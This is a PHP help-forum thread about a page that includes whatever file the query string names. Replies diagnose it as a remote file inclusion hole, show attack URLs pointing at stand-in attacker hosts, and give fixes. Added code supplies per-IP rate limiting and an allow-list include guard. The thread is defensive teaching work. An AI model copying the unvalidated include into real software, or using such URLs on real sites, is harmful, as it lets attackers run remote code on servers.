
Pixelsize

[Resolved] Is this an exploit?


Hi there, I think this is the place to post this question.

At the webhosting I'm at, they keep suspending my webpage because my code is vulnerable to attacks. This is the code:

[code]<?php

// Security patch against spam exploit
// Provided by TangoWebs
// Rejects any POST field that carries a mail-header fragment (e-mail header injection)
$badStrings = array("Content-Type:", "MIME-Version:", "Content-Transfer-Encoding:", "bcc:", "cc:");

foreach ($_POST as $k => $v) {
    foreach ($badStrings as $v2) {
        if (strpos($v, $v2) !== false) {
            header("HTTP/1.0 403 Forbidden");
            exit;
        }
    }
}

?>

<title>Heh I didn't wanna show the site's title xD sry xD</title>

<link href="style.css" rel="stylesheet" type="text/css">

<?php

// Variables
$page = isset($_GET['page']) ? $_GET['page'] : ''; // Gets the page name straight from the query string, unvalidated

// Display
include "header.html"; // Shows Header

if ($page == "") {
    $page = "home";
}

$page = $page . ".html";

include $page; // Includes whatever file (or URL) the visitor named

include "footer.html";

?>[/code]

TangoWebs is the name of the webhosting company... they provided this code and asked me to put it in, and they say hackers are still sending e-mails, mail bombing, or whatever... from my website. This is just one page, but they are all exactly the same, just changing which directory to include. Thanks for your time, I hope anyone could see what I still can't. Cya!!  :D

Would need to see the code for generating the e-mails, how the user submits the content for the e-mail and any associated login stuff (like if the user must be logged in and a session is created).

The only thing I could suggest in this little lot is this.

Record the IP address the request originated from and store this in the database along with the time of the request. Each time the script runs it should check the IP address against the database and if there is not sufficient time between the last e-mail and now - deny the request.

I think a 10-minute interval would be sufficient.....

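One way to implement the per-IP interval check suggested in the reply above, as an added example that is not code from the thread or from the hosting company. It assumes PDO with the SQLite driver, a writable file `mail_rate.sqlite` next to the script, and a 600-second minimum interval; the table and function names are assumptions too. The lookup and the update share one write transaction, so two requests arriving at the same instant cannot both pass the check. The limit keys on `REMOTE_ADDR`, the actual TCP peer; an attacker with many addresses (or many users behind one NAT) will defeat or be caught by it, so treat it as a brake, not a fix for the include problem.

```php
<?php
// Added example (not from the original thread): per-IP interval check before sending mail.
// Assumptions: PDO + SQLite, writable mail_rate.sqlite beside this script, 600 s interval.
declare(strict_types=1);

const MIN_INTERVAL_SECONDS = 600;

/**
 * Returns true (and records the attempt) if $ip may send now, false if it must wait.
 * The read and the write share one IMMEDIATE transaction so concurrent requests serialize.
 */
function allowMailFrom(PDO $db, string $ip, int $now, int $interval = MIN_INTERVAL_SECONDS): bool
{
    $db->exec('CREATE TABLE IF NOT EXISTS mail_log (ip TEXT PRIMARY KEY, last_sent INTEGER NOT NULL)');
    $db->exec('BEGIN IMMEDIATE'); // take the write lock before reading
    try {
        $sel = $db->prepare('SELECT last_sent FROM mail_log WHERE ip = :ip');
        $sel->execute([':ip' => $ip]);
        $last = $sel->fetchColumn();

        if ($last !== false && ($now - (int) $last) < $interval) {
            $db->exec('ROLLBACK');
            return false; // too soon since this address last sent
        }

        $up = $db->prepare('INSERT OR REPLACE INTO mail_log (ip, last_sent) VALUES (:ip, :now)');
        $up->execute([':ip' => $ip, ':now' => $now]);
        $db->exec('COMMIT');
        return true;
    } catch (Throwable $e) {
        $db->exec('ROLLBACK');
        throw $e;
    }
}

$db = new PDO('sqlite:' . __DIR__ . '/mail_rate.sqlite');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// REMOTE_ADDR is the TCP peer. Do not read X-Forwarded-For unless a proxy you control sets it.
$ip = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';

if (!allowMailFrom($db, $ip, time())) {
    http_response_code(429);
    exit('Too many requests: wait before sending another message.');
}

// ... build and send the e-mail here ...
```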
No login, no forms... this is all... They say they won't reactivate my account until I can ensure that the code has no security holes :S So I can't do tests... But do you think anyone could just send e-mails by taking advantage of... what? a $_GET???

Well, in that case the only vulnerability is the include $page bit.

Say someone had a page they had written to send out mass e-mails and it was located here:

http://www.dodgeysite.com/email.php

They could use your page to exploit that by simply setting page=http://www.dodgeysite.com/email.php in the URL.

On my sites I always use a control on includes that are driven by the user's input.

My includes always look like

include($_SERVER['DOCUMENT_ROOT'] . $page);

That way the file being included MUST reside on your domain.

This code here is very vulnerable!
[code]if ($page=="") {

$page="home";

}

$page=$page . ".html";

include $page;[/code]
A malicious attacker can put something like this:
yoursite.com?page=http://attackersite.com/badfile.html
Now within that badfile the attacker made there could be PHP code which would not only affect your account, but everyone else's account on the host's server, and cause havoc with the database.

So what's the way around this? To validate the user input. Before you include, make sure:
- the page variable doesn't hold URLs - preg_match can help you there
- the file you are going to be including actually exists on your site - file_exists can help here too

With file_exists don't do this:
if(file_exists($_GET['page']))

Append your site's document root to it like so:
if(file_exists($_SERVER['DOCUMENT_ROOT'] . $_GET['page']))

Never use raw _GET or POST'd data! Always validate and verify user input.

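The two replies above both recommend anchoring the include to your own document root; the routine below is an added example (not code from the thread, from wildteen88 or from TangoWebs) that puts their advice into practice and adds the one check they leave out. Prefixing $_SERVER['DOCUMENT_ROOT'] does stop the remote-URL trick, but a page name such as ../../../etc/passwd or ../otheruser/config.php still passes a file_exists test on the same host, so the example allow-lists the page name with preg_match, resolves the path with realpath and then confirms the result still lies under the pages directory. The pages/ directory, the .html naming and the resolvePage function name are assumptions.

```php
<?php
// Added example (not from the original thread): safe replacement for `include $page`.
// Assumptions: page files live in ./pages/<slug>.html next to this script.
declare(strict_types=1);

/**
 * Resolve a user-supplied page slug to a file inside $baseDir, or return null.
 * Two independent checks: a strict allow-list on the slug, then a canonical-path check.
 */
function resolvePage(string $requested, string $baseDir): ?string
{
    if ($requested === '') {
        $requested = 'home'; // same default the original page used
    }

    // 1. Allow-list: only lowercase letters, digits, hyphen and underscore, 1-64 chars.
    //    This alone rejects "http://...", "../", "php://", NUL bytes and absolute paths.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    // 2. Canonical-path check: realpath() resolves symlinks and "..", and returns
    //    false for a file that does not exist, so this replaces file_exists() too.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested . '.html');
    if ($candidate === false || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // missing, or resolved to somewhere outside the pages directory
    }
    return $candidate;
}

$page = isset($_GET['page']) ? (string) $_GET['page'] : '';
$file = resolvePage($page, __DIR__ . '/pages');

include __DIR__ . '/header.html';
if ($file === null) {
    http_response_code(404);
    echo '<p>Page not found.</p>';
} else {
    include $file;
}
include __DIR__ . '/footer.html';
```

Keeping the allow-list even though the realpath check would catch traversal on its own means a malformed request is rejected before the filesystem is touched at all, and the page name never reaches include as anything but a known-good slug.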
There was recently a discussion similar to this one that you should find useful.
http://www.phpfreaks.com/forums/index.php/topic,95407.msg382014.html#msg382014

xD!!! GOSH!!! WHAT AN OBVIOUS EXPLOIT, yeah, I'll fix it right away - thank you all for your time... gosh, so obvious xD. Thank you all. Cya!

[quote author=wildteen88 link=topic=99803.msg393230#msg393230 date=1152296362]
Append your site's document root to it like so:
if(file_exists($_SERVER['DOCUMENT_ROOT'] . $_GET['page']))
[/quote]
That's really useful - thank you :)
